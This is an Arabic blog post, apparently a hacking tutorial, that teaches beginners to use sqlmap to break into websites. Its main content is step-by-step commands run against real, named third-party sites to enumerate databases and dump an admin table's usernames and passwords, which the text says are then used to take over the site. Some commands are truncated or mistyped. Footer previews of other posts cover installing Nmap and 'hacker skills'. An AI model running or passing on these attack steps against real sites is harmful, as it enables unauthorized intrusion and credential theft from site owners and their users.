شرح اداة sqlmap لاختراق المواقع 🐍.

 مصابة بثغرة sql]


طبعاً لو انت مخترق مواقع مبتدأ وتريد والبحث عن مواقع مصابة وثغراتها طبعاً هيكون ابتدائك اولا باختراق مواقع sql وده يعتبر اسهل ثغرات لاختراق المواقع لو كنت حابب اختراق مواقع وكشف ثغرات وتلك الاعمال وكنت مشغول بها جدا ستتمكن من ذلك بعد تعلم ثغرة sql وطريقة برمجتها واستخدامها واختراقها ايضاً والان سأشرح لكم بالتفصيل كيف يتم اختراق ملفات الموقع واستخراج اليوزر والباسورد لكي تستطيع ان تقوم باختراق الموقع



اولا سنقوم بتحميل الاداة sqlmap عبر كتابة امر 


• git clone https://github.com/sqlmapproject/sqlm...


اولا ستقوم بجلب اي موقع مصاب وثم دخول الى مجلد sqlmap

عبر كتابة امر 

• cd sqlmap

ثم نقوم بكتابة امر 

• python2 sqlmap.py -u 

https://tncgroup.pk/content.php?Id=3

  - -dbs

طبعا بدلا من كلمة URL SITE تقوم باضافة رابط الموقع المصاب SQL

مثال

•python2 sqlmap.py -u http://www.artstatements.com/artist_d... --dbs


⚡♥⚡♥⚡♥⚡♥⚡♥⚡♥


طبعاً الان تم دخول الى ملفات الموقع اي اننا قمنا باختراق الموقع الان نكتب هذا الامر لكي ان تستطيع دخول الى ملف الاساسي للموقع

• python2 sqlmap.py -u http://www.selectservice.ca/m/content... --tables

طبعاً هتغير اسم Namefile بكتابة اسم الملف الخاص للموقع

ثم تظهر لك ملفات الموقع الاخرى مثل المقالات الموقع او الحسابات مسجلة في الموقع وبيانات الموظفين والحسابات و كلمات السر الموقع اليوزر النيم والباسورد 

⚡♥⚡♥⚡♥⚡♥⚡♥⚡♥⚡♥

تترك كل ملفات لانك لن تحتاجها فقط قم بالبحث عن ملف خاص لبيانات دخول الموقع نقوم بكتابة امر 


• python2 sqlmap.py -u http://www.selectservice.ca/m/content... --D staff -T user site --columuns


طبعا بدلا من  اسم NAMESITE تقوم بكتابة اسم ملف الخاص للموقع الذي يحتوي على اليوزر والباسورد وعادة تكون اسمها


user site , password , user


وهكذا شبيهة لتلك الاسماء على سبيل مثال ساقوم بفتح ملف اسمها 

user_name & password 

-----

هكتب الامر اللي جاي لسحب كلمات المرور واليوزر للموقع

• python2 sqlmap.py -u -u https://tncgroup.pk/content.php?Id=3 --D tncgroup_webx -T tbl_admin --C pname,ppass --dump

وبعد كتابة الامر هيظهرلك اليوزر والباسوردات الخاص بالموقع انت فقط يمكنك تغيير اسم ملفات الذي تريده ويمكنك من خلال اليوزر والباسورد اختراق الموقع بكل سهولة


@mafia_7x : المصدر

تعليقات

إرسال تعليق

المشاركات الشائعة من هذه المدونة

طريقة تثبيت اداة Nmap على جميع الأنظمة(اندرويد، لينكس، ماك، ويندوز)

صورة
  مرحبا بكم في مدونة HEM2-PY في هذا الدرس سنتعرف على طريقة تثبيت اداة Nmap على جميع الأنظمة(اندرويد، لينكس، ماك، ويندوز).  تثبيت الاداة على نظام لينكس في الحقيقة الاداة تأتي مثبتة تلقائيا على اغلب أنظمة لينكس لكن اذا لم تكن الاداة مثبتة  واردت تثبيت اداة Nmap على تظام التشغيل لينكس فيجب عليك اولا الذهاب الى موجه الاوامر الخاص بنظام لينكس (Terminal) ثم كتابة الامر : kali@kali:~# sudo apt-get install nmap     لمعرفة اصدار اداة Nmap الخاصة بك على نظام الينكس : kali@kali:~# nmap –version     لتثبيت الواجهة الرسومية  GUI  من اداة Nmap في نظام لينكس Zenamp : kali@kali:~# wget -q https://nmap.org/dist/zenmap-7.91-1.noarch.rpm     kali@kali:~# sudo apt install alien     kali@kali:~# sudo alien zenmap-7.91-1.noarch.rpm     kali@kali:~# sudo dpkg –i zenmap_7.91-2_all.deb     واذا اردت فتح اداة Zenmap يمكنك فتح الاداة بطريقتين : 1. يمكنك فتح الاداة بصلاحيات الـ  Root  عن طريق كتابة الامر التالي  kali@kali:~# sudo zenmap     2.  يمكنك فتح الاداة عن طريق الدخول للبحث وكتابة الكلمة التالية  Zenmap  
قراءة المزيد

🟢أهم 10 مهارات يجب أن يتعلمها كل هكر👇

صورة
يمتلك الهكر ذو القبعة البيضاء طريقة ممتعة لاستكشاف مجال الأمان ، لقد رأينا العديد من الأفلام التي تصور المخترق على أنه ذكي وفعال وسريع بما يكفي لخرق أمن المؤسسات الكبيرة ، حسنًا قد يكون من السهل تصوير الشخصية على الشاشة ولكن معظم الناس غير مدركين للعمل الجاد والتفاني للوصول إلى هذا الإنجاز ، الحقيقة هي أنه لا يوجد طريق مختصر أو محدد ولكن الأمر يتطلب بالتأكيد الفضول والتعلم المتسق وسنوات من الصبر لتحقيق هذا الهدف ، إذن إليك قائمة بـ 10 مهارات يجب أن يتعلمها كل هكر والتي تستطيع ان تتبعها لكي تصبح محترف. المهارات الأساسية لاستخدام الحاسوب قبل السير في هذا المجال ، يجب أن يكون لدى المرء المعرفة الأساسية بالمعالجة والعمليات والأداء ووظائف الكمبيوتر ،  MS Office  ، جداول البيانات ، إدارة ملفات الكمبيوتر هي التوقعات الأساسية التي يمكن أن يتوقعها المرء من أي شخص مهتم بقطاع تكنولوجيا المعلومات ، إنه مثل تعلم السيف قبل الدخول في الحرب. شاهد أيضا  أفضل 10 أنظمة للهكرز ومحللين الشبكات . مهارات البرمجة تمنح المعرفة حول أساسيات البرمجة ميزة للمتسلل الأخلاقي ، سيتمكن المتسلل من اختراق البرنامج إذا كا
قراءة المزيد